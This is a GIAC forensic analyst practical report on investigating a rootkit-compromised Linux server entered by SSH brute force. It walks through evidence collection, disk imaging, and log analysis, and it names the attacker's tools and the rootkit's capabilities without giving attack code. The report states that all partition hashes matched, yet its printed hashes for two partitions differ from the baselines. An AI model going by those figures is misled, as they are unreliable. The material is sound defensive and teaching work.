Fight crime. Unravel incidents... one byte at a time.

Interested in learning more?
Check out the list of upcoming events offering "Advanced Incident Response, Threat Hunting, and Digital Forensics (FOR508)" at http://digital-forensics.sans.org/events/
Discovery Of A Rootkit:
A simple scan leads to a complex solution

GIAC Certified Forensic Analyst (GCFA)
Practical Assignment

Version 1.5
Option 2 – Forensic Analysis on a System

John Melvin
Submitted 15 Apr 2005
## Table Of Contents

A simple scan leads to a complex solution 1  
   Table Of Contents 2  
Option 2 – Forensic Analysis of a System 3  
Synopsis of Case Facts 3  
Executive Summary 4  
System Details 6  
   First-Response Measures and Collection 6  
   Target System Description 9  
   Hardware Seized /Chain of Custody 10  
Imaging the Media 10  
   Imaging Procedure and Verification 10  
   Step One – Checksum of Original Disk and Individual Partitions 11  
   Step Two – Create Disk Image and Integrity Verification 12  
   Step Three – Carving Out Individual Partitions and Integrity Verification 12  
Media Analysis of System 14  
   Forensic Workstation and Tools Used 14  
   Mounting the Images as File Systems 15  
   Log File Analysis 15  
   History File Analysis 20  
   File System Analysis 23  
      Finding Odd Or Hidden Directories and Files 23  
      Setuid and Setgid Files 26  
      INODE Searches 26  
      Analysis of /etc 33  
      Start-up Files and Processes 34  
Timeline Analysis 34  
   Timeline of Deleted But Intact INODES 34  
   MAC Time Analysis 35  
Recovering Deleted Files 42  
Conducting a String Search 43  
   Keywords and Search Procedures 43  
Re-Hashing Integrity Of Our Images 45  
Conclusions 46  
   Method of Compromise/Intruder Activity 46  
References 47  
Attached Timeline 47
Option 2 – Forensic Analysis of a System

Synopsis of Case Facts

Discovery of a root kit; funny how sometimes we find things based on events not entirely relating or directly affecting other systems. Even seasoned security experts cannot monitor and catch every possible incident, sometimes it’s just pure luck or coincidence that we stumble upon compromises. On 02-Aug-04/0012Z, we stumbled upon this exact scenario although we wouldn't know it right away.

Every day the Air Force networks are constantly tested, scanned, probed, etc and our analysts spend 24 hours a day verifying, challenging, and responding to all of these threats. The Air Force network is complex, detailed, and ever-changing and we are constantly issuing checks-and-balances to ensure only authorized traffic enters or leaves our perimeters. On the morning of 02 Aug a simple port scan from a Colombian IP put our processes, skills, and responses to the test.

What’s so significant about a port scan anyway? We see them everyday, we can't stop them, and a lot of us don't even bother taking the time to analyze them. In our case, the port scan wasn't really the significant threat, however, the presence of the scan led to very significant findings. Our analysts are required to address all threats, including simple port scans. For instance, we will take the net block of the scanning IP, conduct searches on it, and correlate it will all the systems it touches – then we do analysis on those IP's. It's a tedious task, but thanks to our process this simple port scan led to our discovery of a rootkit.

Shortly after receiving the port scan alert, our analysts researched the Colombian IP net block and found that it had made a connection, with data returned, to a different military system residing in Alabama. Further analysis on the Alabama IP showed the existence of both in-bound and out-bound connections to foreign and domestic IP's, all over port 22. Our standard procedure at this point was to contact the IA of the affected base and have them verify the traffic between these IP's with local administrators. Within the hour the administrator called us and stated four primary things; one, the traffic to the IP's we identified was not authorized. Two, he could not log into the system because it was hung. Three, he had rebooted the system several times and finally had to load an old, previous kernel in order to get access to the system. And four, his root password did not work. Very interesting. Our normal procedure would have next been to notify our incident response team to conduct first-level evidence collection and to have the system administrator unplug the system from the network. However, we were faced with a serious issue because the system has not only been rebooted, but modified by the system administrator. In fact, our incident response team didn't want to pursue this event at all because live analysis seemed hopeless now. What about dead, static analysis instead? This seemed to be the perfect chance to have our forensic team take the lead, and hopefully output meaningful and surprising results.
Even though the system had been rebooted and loaded with a previous kernel, we still performed a first-response evidence collection with a tool set of statically linked binaries. Normally used for live forensics, the tool set did show multiple file modifications and the existence of several unauthorized files. The most beneficial output from this analysis is it gave us a good starting point for when something malicious might have taken place. We determined at that point to seize the hard drive for evidence and analysis.

What we found to be most challenging is we were presented a task to find out what happened given nothing more than a port scan and an unresponsive system. We dove into our forensic analysis with just a couple of small pieces of information, maybe SSH was the entry and maybe it happened between July-August timeframe.

Executive Summary

02-Aug-04/0012Z, Realtime Analyst noted a Distributed Port Probe alert on port 22 from a Columbian IP. Research showed the Columbian IP had made a connection, with data returned, to a military system residing in Alabama. Further analysis showed several other systems, both foreign and domestic, had connections over port 22 to the same Alabama IP. Affected base personnel were contacted to validate the traffic. During the validation, the traffic was identified as unauthorized. Based upon this and the existence of both in-bound and out-bound connections to multiple IP’s, a CAT I Incident (root-level) was declared at 18:29Z.

03-Aug-04/0020Z, The victim system appears to have been modified by the attacker resulting in the system not being able to return to operation. Local system administrator rebooted the system several times and eventually loaded a previous kernel in order to gain control of the system. System administrator noted the root password did not work for him. Victim system was taken offline.

03-Aug-04/1351Z, Our first-response tool kit was deployed to local IA personnel to collect live analysis on the system even though the system had been rebooted and modified. Results of the examination showed multiple file modifications, the existence of unauthorized files, and a NIC card in promiscuous mode.

04-Aug-04/0345Z, Determination was made to seize the hard drive for further analysis. Our evidence so far had showed us that a lot of modification to the system as well as creation of unauthorized files happened on 28 July 04.

06-Aug-04/1236Z, Our forensic team received the hard drive, forensics analysis of the system indicates that a US IP is most likely the initial source of the compromise. Evidence shows this IP conducting a brute force attack against the victims ssh server. Additional research found that this IP was
documented as conducting other brute force SSH attacks against commercial sites over a period of several days.

10-Aug-04/1900Z, Analysis of files found on the victim hard drive support the identification of the initial compromise being accomplished through a brute force attack on ssh. Once on the system, the attacker downloaded copies of a brute force script [haitateam.tgz] and other tools to facilitate his continued access on the victim system. The attacker also attempted [unsuccessfully] to use the victim system to perform out-bound scanning of other systems.

11-Aug-04/1900Z, Further analysis of victim hard drive indicates a strong possibility that the Columbian IP is the system that follows up from the initial scan/brute force attempts from the US IP. Review of victim logs shows Columbian intruder searching through system logs for the presence of the US IP, then opening the logs with a text editor. Our search through system logs show no indication of this IP, so it's assumed the intruder had root access and modified the logs by removing this IP.

20-Aug-04/1900Z, Confirmed with user for victim system that root's password was indeed weak. All analysis correctly points to a brute force attack on the SSH program, a modification to root's password by the hacker, and an installation of a trojanized SSH server (rootkit).

20-Aug-04/2100Z, Forensic analysis showed the presence of several malware, trojans, rootkits, and sniffers that once existed or currently existed on the victim system;

- A backdoor on TCP port 33221, 51980 and 31313 may have existed at one point,
- Numerous hacking tools, scripts, cleaning applications, examples, tutorials, password crackers, etc were found as deleted data
- Root's password had changed
- All major system logs were modified (/var/log*)
  - Deleted, chmod, edited, and created – all root functions
- ".desktop" was trojanized to sniff modifications to system files
- "driftnet" was used to capture network traffic, specifically to intercept and forward web traffic
- The "Linux.OSF.8759 Trojan" did exist on the system at one point
- Numerous system binaries were confirmed to be trojanized
- The 'mYrk' rootkit was discovered as a trojanized binary called 'zic' in /usr/sbin. The file 'zic' is a legitimate Linux binary by default. The rootkit is capable of hiding processes, files, network sniffing, modifying firewall rule-sets, and key logging.
- Further analysis showed the trojanized binaries had many similarities to (2) well-known rootkits:
  - t0rn(r)v8 (Classic root-kit style)
ShKIT (an SSH server backdoor rootkit)

21-Aug-04/1900Z, Forensic analysis completed. System administrators will not put this system back online.

25-Aug-04/1900Z, Analysis of mYrk rootkit completed. Evidence showed the presence of a key/terminal logger stored under /usr/lib/ix86/logz. The logger stores sniffed information to a file called pass.log. Within the pass.log file evidence showed the hacker contacted and may have compromised 5 other systems on the same network. Further research and analysis of those systems have turned up negative. Additionally, the rootkit contained two clean-up files used to erase tracks/logs called 'wclean' and 'v'. The rootkit puts the NIC into PROMISC mode but does not open any backdoor ports. Simply, it will listen for a trigger packet or data in order to 'wake' up.

29-Aug-04/0220Z, All analysis complete and all recovery procedures complete, incident was closed.

System Details

First-Response Measures and Collection

A full day after we determined there was unauthorized SSH traffic to our system, we coordinated with local system administrators to run a first-level evidence collection tool. Even though the system had been modified by the administrator by rebooting and loading a previous kernel, we still wanted to gather as much information about the system in the state it was in currently. In fact, a lot of the commands did not produce any output because the administrator could only regain control of the system in single user mode. On the box there were 7 bootable kernels, each one was an upgrade to the previous one. When the latest kernel got corrupted, presumably by the intruder, the administrator had to resort to a kernel that was 4 generations old in order to be able to boot in at least user-mode. Our point with this was to show other analysts that although the system is not in the same state as the initial compromise, valuable evidence can still be obtained.

The toolset was specifically designed to run trusted, static binaries from an image file then save the output results to a floppy disk. The first part of the toolset is to gather system information, below are the commands implemented and the pertinent data collected from them.

```bash
uname -a
```

Linux 5959 2.4.18-27.8.0 #1 Fri Mar 14 06:45:49 EST 2003 i686 unknown

```bash
who
```

who
No Output

```
netstat -an

Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State
Active UNIX domain sockets (servers and established)
Proto RefCnt Flags Type State I-Node Path
unix 2 [ ACC ] STREAM LISTENING 197 /dev/log

netstat -rn

Kernel IP routing table
Destination Gateway Genmask Flags MSS Window Irtt Iface

ps -auxww

PID TTY Uid Size State Command
1 root 1384 S init [S]
2 root 0 S [keventd]
3 root 0 S [ksqirqd_CPU0]
4 root 0 S [kswapd]
5 root 0 S [bdflush]
6 root 0 S [kupdatad]
7 root 0 S [mdrecoveryd]
11 root 0 S [kjournald]
68 root 0 S [khued]
122 root 1736 S minilogd
186 root 0 S [kjournald]
187 root 0 S [kjournald]
188 root 0 S [kjournald]
302 tty1 root 1384 S init [S]
303 tty1 root 2208 S /bin/sh
306 tty1 root 632 S /bin/sh ./toolset
353 tty1 root 592 R ps -auxww

mount

rootfs on / type rootfs (rw)
/dev/root.old on /initrd type ext2 (rw)
/dev/hda1 on / type ext3 (rw)
/proc on /proc type proc (rw)
usbdevfs on /proc/bus/usb type usbdevfs (rw)
none on /dev/pts type devpts (rw)
/dev/hda2 on /home type ext3 (rw)
none on /dev/shm type tmpfs (rw)
/dev/hda5 on /usr type ext3 (rw)
/dev/hda6 on /var type ext3 (rw)
/dev/fd0 on /mnt/floppy type ext2 (rw)

uptime

3:38pm up 1 min, load average: 0.65, 0.20, 0.06
```
ifconfig -a

---------------------------------------------
eth0  Link encap:Ethernet  HWaddr 00:50:DA:59:47:FB
       BROADCAST PROMISC MULTICAST  MTU:1500  Metric:1
       RX packets:0  errors:0  dropped:0  overruns:0  frame:0
       TX packets:0  errors:0  dropped:0  overruns:0  carrier:0
       collisions:0  txqueuelen:100
       RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)
       Interrupt:5  Base address:0x1000

lo   Link encap:Local Loopback
       LOOPBACK  MTU:16436  Metric:1
       RX packets:0  errors:0  dropped:0  overruns:0  frame:0
       TX packets:0  errors:0  dropped:0  overruns:0  carrier:0
       collisions:0  txqueuelen:0
       RX bytes:0 (0.0 B)  TX bytes:0 (0.0 B)

What have we collected so far from our toolset? We can see the output from
the commands uname, who, netstat, ps, and uptime all show us the system
was recently rebooted, running a previous kernel (2.4.18), and running in single
user mode. We didn't gather too much information from these commands.
However, the ifconfig output shows us that NIC eth0 was set in PROMISC
Mode. This was our first real evidence that something malicious had happened.
Notice the output from the mount command, this will be used later to
correctly mount our partition images to the correct directories.

The second part of the toolset gathers file listings from critical directories
using a basic format of 'ls -Rrlta'. Below are the significant findings from those
outputs.

/usr/bin

---------------------------------------------
lrwxrwxrwx    1 root     root           13 Jul 28 12:41 BitchX -> BitchX-1.0c17
-rwxr-xr-x    1 root     root        18916 Aug  1 16:10 v
-rwxr-xr-x    1 okray  okray     59536 Jul  3  2002 find
-rwxr-xr-x    1 okray  okray     31452 Jul  1  2002 md5sum
-rwxr-xr-x    1 okray  okray     23560 Jun 23  2002 slocate
-rwxr-xr-x    1 okray  okray     33992 Aug 12  2002 top

/etc

---------------------------------------------
-r--------    1 root     root         1088 Jul 28 05:29 shadow
drwxr-xr-x    2 root     root        4096 Aug  1 17:24 ssh2

/etc/rpm

---------------------------------------------
drwxr-xr-x    2 1005     1005         4096 Jul 31 08:23 clean-osf
-rw-r--r--    1 root     root        13658 Jul 31 08:22 clean.tar.gz
What did we collect from our output for file listings? Actually, quite a bit. Under the /usr/bin directory we noticed six suspicious files; On 28 Jul an installation of the IRC server called BitchX was written to, 4-days later on 1 Aug a file called 'v' was written to, and several system binaries normally owned by root were owned by a user called 'okray' (find, slocate, md5sum, and top).

Under the /etc directory we noticed two suspicious entries; The shadow file was written to on 28 Jul, and a directory containing what appears to be a second install of an SSH server was written to 4-days later. Coincidently, this matched when BitchX and 'v' were written to.

The /etc/RPM directory contained two entries that seemed suspicious; a file called clean.tar.gz and a directory called clean-osf were both written to on 31 Jul. A quick search for these files on Google gave us hits to clean-up scripts for the Linux.osf.8759 Trojan. This Trojan is a remote administration tool, normally creating a backdoor on UDP port 3049.

The /sbin, /usr/sbin, and /bin directories all contained more system binaries normally owned by root but had user okary as the owner; ifconfig, syslogd, lsof, login, netstat, and ps. This was a very interesting find for us, because it sure looked as if something had trojanized major binaries an administrator would normally use to gather system information. It should be noted that all of the system binaries with an owner of okray all maintain what appeared to be their original install dates. If these binaries are trojanized the application could have made an effort to maintain original time stamps. If the binaries were issued a 'chown' command to change to user okray, this will not modify the time stamp according to our 'ls' output. Maybe too, if a rootkit used 'mv' to copy files, this will not modify the timestamp for 'ls' either.

We now had some leads for our analysts, and perhaps an initial date of compromise on 28 July. This will become important when we start to create our timeline of the incident.
Incident Number: 2004-04-34
Date: 02-Aug-04/1829Z
Location: Alabama
Application of System:  Development; test newly developed web site, etc.
Operating System/Release/Version: RedHat 8 (2.4.20-28.8)
Hardware:
  Micron P-III 500, serial number: 8KWGK01
  Intel(R) Pentium(R) III CPU 1133MHz
  IBM Deskstar HDD, Capacity 13 GB.
  MemTotal: 1032668 kB
Network Interface Type: 3Com Boomarang
Authorized Open Ports: 443, 22, 80
Number of Users Supported By System: 1
Behind/In-Front of Firewall:  Behind Firewall, although no ACL's for inbound ports 443, 22, or 80
Date System Originally Put On-Line:  June 2002

Talking with the system administrator a few questions and concerns came to mind for our analysts.  It seemed odd that some much SSH traffic went unnoticed from so many different foreign and domestic IP's.  Additionally, the system had been hung for 2-days and no one seemed to noticed.  Probably the biggest concern for us was root's password did not work but the administrator had not logged into that system in over 6-months and never knew that.  What kind of system was this anyway?

Turns out our victim system used to be a development server to test webpage functionality for a front-end project they maintained.  SSH was used to transfer webpage reports back-and-forth from the webmasters desktop to the server.  The server had no other mission functions.  A single user called 'okray' occasionally logged onto the system to test PERL scripts and learn how to use Unix in general.  In the words of the local administrator, "This system sits in the corner of our lab and collects dust".

The firewall for their subnet was set up with ACL's to block both inbound and outbound traffic by specific IP's only (meaning, no 'block-all' type rules).  So, a system in the corner collecting dust had been forgotten, no firewall ACL's prevented connections to it.  The administrator said that only three ports were open to it anyway, 80, 443, and 22, all used for the previous web-testing functionality.  However, this system did have trust relationships with five other servers within their lab, and those servers could both touch the outside world as well as the internal LAN.

Hardware Seized /Chain of Custody

Tag #:  2004-04-34-HDD
Description:  13GB IBM Deskstar HDD, ATA/IDE
Serial #:  JHT2C673
Model #:  DPTA-371360
MD5 Hash:  06e0b921b0588e3f64b486d19267c9e8
Date Received:   06-Aug-04/1236Z
Imaging the Media

Imaging Procedure and Verification

On 04 Aug the decision to seize the victim hard drive was made. The system administrator unplugged the power cord then removed the drive. On 06 Aug the victim hard drive was received by our forensic lab for analysis. No MD5 was made by the system administrator prior to removal from the system, so we have to assume the disk remained unmodified during transport.

Our first task was to perform an MD5 hash of the entire drive and each separate partition as our initial baseline for comparison. Since the forensic tools used in our investigation, and capabilities of the OS, require raw partition images instead of full disk images we needed to break the full disk into separate partitions for analysis. Therefore, our mind-set was to ensure integrity throughout the entire process, first by generating an entire drive hash and then generating hashes for each partition.

We next completed a full image of the drive and conducted integrity verification against the hash for the physical drive. This ensures our image was not modified from receipt of the original drive.

Our last step was to extract each individual partition from the full image and conduct verification against the hashes for the physical partitions. This ensures we extracted the partitions correctly and they were not modified.

The swap partition was not considered for imaging or analysis since the system had already been rebooted several times before we acquired the hard drive.

Step One – Checksum of Original Disk and Individual Partitions

Our victim drive was connected as a slave, ro, device listed as /dev/hdc from the fdisk -lu output:

Disk /dev/hdc: 13.6 GB, 13676544000 bytes
255 heads, 63 sectors/track, 1662 cylinders, total 26712000 sectors
Units = sectors of 1 * 512 = 512 bytes

Device Boot Start End Blocks Id System
/dev/hdc1 * 63 1718954 859446 83 Linux
/dev/hdc2 1718955 8273474 3277260 83 Linux
/dev/hdc3 26185950 26700029 257040 82 Linux swap
/dev/hdc4 8273475 26185949 8956237+ 5 Extended
/dev/hdc5 8273538 14217524 2971993+ 83 Linux
/dev/hdc6 14217588 26185949 5984181 83 Linux

Partition table entries are not in disk order
Disk /dev/hda: 20.0 GB, 20020396032 bytes
255 heads, 63 sectors/track, 2434 cylinders, total 39102336 sectors
Units = sectors of 1 * 512 = 512 bytes

Device Boot  Start  End    Blocks   Id  System
/dev/hda1    *       63  208844  104391   83  Linux
/dev/hda2  208845  37543904  18667530   83  Linux
/dev/hda3  37543905  39102209    779152+  82  Linux swap

We needed to therefore generate MD5 hashes for the entire drive, /dev/hdc, and all partitions we were going to analyze, in this case /dev/hdc1, /dev/hdc2, /dev/hdc5, and /dev/hdc6.

[root@LinuxForensics 0434]# md5 /dev/hdc
06e0b921b0588e3f64b486d19267c9e8 /dev/hdc

[root@LinuxForensics 0434]# md5 /dev/hdc1
f38e01425d3052dfcd590f40f5f01333 /dev/hdc1

[root@LinuxForensics 0434]# md5 /dev/hdc2
069341deb7edc79f76635922e63bc081 /dev/hdc2

[root@LinuxForensics 0434]# md5 /dev/hdc5
0a21f34ee8d75c7cef6d87deaa92db670 /dev/hdc5

[root@LinuxForensics 0434]# md5 /dev/hdc6
fbe44d80f69b88adb8047a9199cef578 /dev/hdc6

Step Two – Create Disk Image and Integrity Verification

Our only objective at this stage was to ensure the dd image for the entire drive had an MD5 hash that matched our baseline.

[root@LinuxForensics 0434]# dd if=/dev/hdc of=04-34/04-34.img

[root@LinuxForensics 0434]# md5 /04-34/04-34.img
06e0b921b0588e3f64b486d19267c9e8 04-34.img

Our first integrity check matched, we had an entire disk image that matched our physical drives MD5 hash.

Step Three – Carving Out Individual Partitions and Integrity Verification

Disk /dev/hdc: 13.6 GB, 13676544000 bytes
255 heads, 63 sectors/track, 1662 cylinders, total 26712000 sectors
Units = sectors of 1 * 512 = 512 bytes

Device Boot  Start  End    Blocks   Id  System
/dev/hdc1    *       63  1718954  859446   83  Linux
I didn't like the output of the `fdisk -lu` command above because it displays number of blocks and not number of sectors. Therefore, to calculate exactly where partitions start and end we would have had to subtract the value in the 'End' sector column from the 'Start' sector column and then add '1'. This calculation would get the number of sectors at the partition boundary. For instance, for the first partition we would subtract 63 from 1718954 and add 1, which gives us 1718892.

Instead, I used the `sfdisk -l -uS` command against the system which gives us exactly the correct boundaries without having to do any calculations. This will make extracting the partitions from our entire image a lot easier as we will see shortly.

```
Device Boot    Start       End   #sectors  Id  System
/dev/hdc1   *        63   1718954    1718892  83  Linux
/dev/hdc2       1718955   8273474    6554520  83  Linux
/dev/hdc3      26185950  26700029     514080  82  Linux swap
/dev/hdc4       8273475  26185949   8956237+   5 Extended
/dev/hdc5       8273538  14217524   2971993+  83  Linux
/dev/hdc6      14217588  26185949   5984181   83  Linux
```

Just to ensure all the partitions were correctly being identified, I also used the command 'mmls' to compare against the `sfdisk` output. We can see in the output all of the partition Tables setting up the primary, extended, and logical drives. We are concerned only with imaging and analyzing the entries titled 'Linux (0x83)' which correspond to hdc1, hdc2, hdc5, and hdc6 above.

```
Slot    Start        End          Length       Description
00:  -----   0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000001   0000000062   0000000062   Unallocated
02:  00:00   0000000063   0001718954   000171892   Linux (0x83)
03:  00:01   0001718955   0008273474   0006554520   Linux (0x83)
04:  00:03   0008273475   0026185949   0017912475   DOS Extended (0x05)
05:  -----   0008273475   0008273475   0000000001   Extended Table (#1)
06:  -----   0008273476   0008273537   0000000062   Unallocated
07:  01:00   0008273538   0014217524   0005943987   Linux (0x83)
08:  01:01   0014217525   0026185949   0011968425   DOS Extended (0x05)
09:  -----   0014217525   0014217525   0000000001   Extended Table (#2)
10:  -----   0014217526   0014217587   0000000062   Unallocated
11:  02:00   0014217588   0026185949   0011968362   Linux (0x83)
12:  00:02   0026185950   0026700029   000514080   Linux Swap / Solaris x86 (0x82)
```

Our objectives for this stage were to use `dd` again to carve out each separate partition from the full image, and ensure the MD5 hashes for each matched our
baseline.

hdc1

[root@LinuxForensics 0434]# dd if=/04-34/04-34.img of=/04-34/hdc1.img bs=512 skip=63 count=1718892

[root@LinuxForensics 0434]# md5 /04-34/hdc1.img
f38e01425d3052dfcd590f40f5f01333  hdc1.img

hdc2

[root@LinuxForensics 0434]# dd if=/04-34/04-34.img of=/04-34/hdc2.img bs=512 skip=1718955 count=6554520

[root@LinuxForensics 0434]# md5 /04-34/hdc2.img
069341deb7edc79f76635922e63bc081 hdc2.img

hdc5

[root@LinuxForensics 0434]# dd if=/04-34/04-34.img of=/04-34/hdc5.img bs=512 skip=8273538 count=5943987

[root@LinuxForensics 0434]# md5 /04-34/hdc5.img
0a21f34ee8d75c7cef6d87dea92db670 hdc5.img

hdc6

[root@LinuxForensics 0434]# dd if=/04-34/04-34.img of=/04-34/hdc6.img bs=512 skip=14217588 count=11968362

[root@LinuxForensics 0434]# md5 /04-34/hdc6.img
fbe44d80f69b88adb8047a99ce5f78 /hdc.img

All of our integrity checks matched, each image had an MD5 hash that matched the physical partitions.

We made copies of each image taken, generated MD5 hashes for them, and stored offline from our forensic system. The victim drive was disconnected and stored within our evidence locker. From this point forward all of our analysis is done on the original images we gathered above.

Media Analysis of System

Forensic Workstation and Tools Used

System Details:
Application of System: Laptop used for forensic analysis and reverse engineering
Operating System/Release/Version:
    Fedora (Linux LinuxForensics 2.4.22-1.2115.nptl)
    Vmware 4.5.2: Windows 2000 professional, SP 3
Hardware:
    HP Pavillion ZV5000
Tools Implemented:
- Coronor's Toolkit – V. 1.15
- Sleuthkit – V. 1.72
- Autopsy Forensic Browser – V. 2.03
- Ethereal – V. 0.98
- Initial Response Toolkit – Static Binaries
  - `uname`
  - `date`
  - `who`
  - `netstat`
  - `ps`
  - `mount`
  - `uptime`
  - `df`
  - `env`
  - `ifconfig`
  - `ls`
  - `cat`
  - `find`
- Vmware – V. 4.5.2
- IDA PRO – V. 4.7
- `dd` – V. 5.0
- `md5sum` – V. 5.0
- `strings` – V. 2.12.91
- `chkrootkit`
- KhexEdit – V. 0.8.5

Mounting the Images as File Systems

Our first interaction with the four partition images we created starts here. We didn't know what image file corresponded to the original mounted directories, so we just picked hdc1.img as a starting point.

```bash
[root@LinuxForensics root]# mount -t ext2 -o noatime,nodev,noexec,ro,loop / 04-34/hdc1.img /mnt/04-34
```

- `t ext2` – We got this filetype from our `sfdisk` and `mmls` output
- `noatime` - Do not update inode access times on this file system
- `nodev` - Do not interpret character or block special devices
- `noexec` - Do not allow execution of any binaries on the mounted file system.
- `Ro` – Mount as Read-Only
- `loop` – Mount the image file as if it were a logical slice

We got lucky with this image because it contained most of the root "/" directories, including /etc where the 'fstab' file is located. A quick look at that
file showed us how the original disk was structured; hdc1 was the “/” partition, hdc2 is the “/home” partition, hdc5 is the “/usr” partition, and hdc6 is the “/var” partition.

Under our /mnt/04-34 directory we created sub-directories corresponding to each partition listed in the fstab file. We then mounted each image to its respective subdirectory, in essence creating a directory structure that mimicked the original disk as close as possible.

Log File Analysis

We revisited what we knew about the incident so far;
- SSH might have been the entry point
- The Date of compromise could have been between 28 Jul – 01 Aug
- The system was unresponsive
- Roots password did not work
- The NIC was in PROMISC mode
- An IRC server was installed
- Key system binaries were owned by user “okray” instead of “root”
- The system might have been infected with the linux.osf.8759 Trojan.

Okay, so we had some clues that we could pursue, but nothing very concrete. Our problem was we had a 13GB image file to look over but didn't know exactly where to begin our analysis. We finally agreed to investigate the log files and system files first, before generating a timeline, since we really did not have a solid starting point. Once we could gather some evidence, we would then generate our timeline tailored for a specific period.

/var/log/Boot.log

There were no entries within the boot.log file, however there are other ways to find out when the system was last rebooted. When we get our timeline established this should tell us exactly when the system was rebooted, in the meantime I took a look at the /etc/rc.d directory to find some clues when the system was last accessed. The main system start-up script called “rc.sysinit” writes to two key log files when the system boots, /var/log/demsg and /var/log/ksyms.0. Taking a look at these files, both were written to on 4 Aug 2004 which matches the last time the system administrator accessed the computer. I took a look inside each file as well and they both log the system time when accessed. Notice too the old kernel the admin had to use in order to even access the system:

Wed Aug  4 07:43:25 EST 2004
Linux 5959 2.4.18-27.8.0 #1 Fri Mar 14 06:45:49 EST 2003 i686 i686 i386 GNU/Linux

Kernel command line: ro root=LABEL=/ single
Initializing CPU#0
Detected 498.856 MHz processor.

/var/log/cron

All entries only showed two jobs being run, I checked out both of these processes and everything looked okay. Below is a snippet of the processes.

Jul 28 00:10:00 5959 CROND[6727]: (root) CMD (/usr/sbin/up2date -u)
Jul 28 01:01:00 5959 CROND[6794]: (root) CMD (run-parts /etc/cron.hourly)

/var/log/Dmesg

The entire dmesg file was filled with the system administrator booting the system into single-user mode, loading a previous kernel, and trying to repair the ext2 partitions. However, it did provide us with two important facts; It showed us when the system was last rebooted, Wed Aug 4 2004, and it showed that the NIC card was in promiscuous mode: .

Enabling bus-master transmits and whole-frame receives.
00:0e.0: scatter/gather enabled. h/w checksums enabled
divert: allocating divert_blk for eth0
device eth0 entered promiscuous mode

/var/log/httpd

We were suspecting SSH to be the entry point for the intrusion but we decided to also take a look at the Apache logs. The system administrator had stated that their web server was only used to test development web pages and did not server any pages for outside users. We took a look at the access.log, error.log, and ssl.access.log and they all seemed to confirm the admins statement, all showed access from only internal LAN IP's.

/var/log/lastlog

Only two entries of significance within this file:

okray :0 Mon Aug 2 14:38:14 -0500 2004

What doesn't make sense to me is the entry for root on 4 Aug, yet the “ls” listing shows the file was last written to on 2 Aug:

-r-------- 1 root root 19136220 Aug 2 2004 lastlog
/var/log/Maillog

What was interesting was this file had zero bytes, last time written to on 1 Aug 2004. In fact, here is an excerpt from the administrator we received on 3 Aug shortly after he was able to log on:

“..... I checked /var/spool/mail/root looking to see if the log watch cron had send root email. But roots email file had about 3 mails when it should of had a large number of emails. Also, there were no more entries within var/log/maillog, was it zero'd out?.....”

/var/log/messages

The messages log was pretty large so at first glance it looked like this would be a great place to find a lot of evidence. In addition, there were several saved message logs about 6-days part going back an entire month. However, it was actually the lack of evidence inside the logs that became our biggest clue; there were no entries from 25 Jul 2004 to the present. Strange, though, that the file was last written to on 1 Aug 2004, did someone zero our these entries too?:

-rw-r--r-- 1 root root 2221758 Aug  1 2004 messages

/var/log/Rpmpkgs

There were five rpmpkgs files and all but the latest one had the same byte count. So, I just took a diff of the most current rpm logfile can compared it to all the others, below is the output:

-rw-r--r-- 1 root root 19852 Jul 31 2004 rpmpkgs

[root@LinuxForensics log]# diff rpmpkgs rpmpkgs.1
2d1
< BitchX-1.0c17-6.i386.rpm

Yes, we already knew that was installed – kind of a loud way to install it though.

/var/log/secure

From the traffic logs we were able to collect to and from the victim system, we had speculated that one IP had done the initial reconnaissance and another IP actually gained access. The secure logs should give us a good look to either credit or discredit our presumption. Again, however, these logs appeared to
have been modified as well. Throughout the logs there are several instances where entire days have gone by without any logging, and large time gaps missing during normal working hours. The last time the file was written to was on Aug 1 2004, yet not entries for Aug at all. Surprisingly, however, there were a few SSH log entries of significance that occurred. If our presumptions were correct, the intruder forgot to clear all of his/her failed logon attempts during the reconnaissance stage. Notice too when these SSH entries were logged, well after normal users already went home and on the date we already suspected as the initial compromise (28 Jul). Final note, doesn’t this look like both a Windows and Linux brute forcer?

```
Jul 28 00:10:15 jas5959 sshd[6733]: Failed password for illegal user test from 69.0.134.72 port 40676 ssh2
Jul 28 00:10:18 jas5959 sshd[6735]: Failed password for illegal user guest from 69.0.134.72 port 40724 ssh2
Jul 28 00:10:21 jas5959 sshd[6737]: Failed password for illegal user admin from 69.0.134.72 port 40731 ssh2
Jul 28 00:10:24 jas5959 sshd[6739]: Failed password for illegal user root from 69.0.134.72 port 40734 ssh2
Jul 28 00:10:26 jas5959 sshd[6741]: Failed password for illegal user admin from 69.0.134.72 port 40741 ssh2
Jul 28 00:10:42 jas5959 sshd[6789]: Failed password for illegal user test from 69.0.134.72 port 40811 ssh2
```

...[...]

```
Jun 28 10:43:34 jas5959 sshd[3316]: Accepted password for root from 69.0.134.72 port 1352 ssh2
Jun 29 07:40:45 jas5959 sshd[3780]: Accepted password for okray from 69.0.134.72 port 3187 ssh2
```

```
/var/log/samba
```

Similarly, we can see other types of probing to the smb service, could be our reconnaissance.

```
[2004/06/25 10:07:39, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator !
[2004/06/25 10:07:41, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator !
[2004/06/25 10:07:44, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest !
[2004/06/25 10:07:46, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest !
[2004/06/25 10:07:49, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User guest !
[2004/06/25 10:07:51, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus16900092 !
[2004/06/25 10:07:53, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User nessus16900092 !
[2004/06/29 09:43:09, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator !
[2004/06/29 09:43:11, 0] passdb/pampass.c:smb_pam_passcheck(827)
  smb_pam_passcheck: PAM: smb_pam_auth failed - Rejecting User administrator !
```
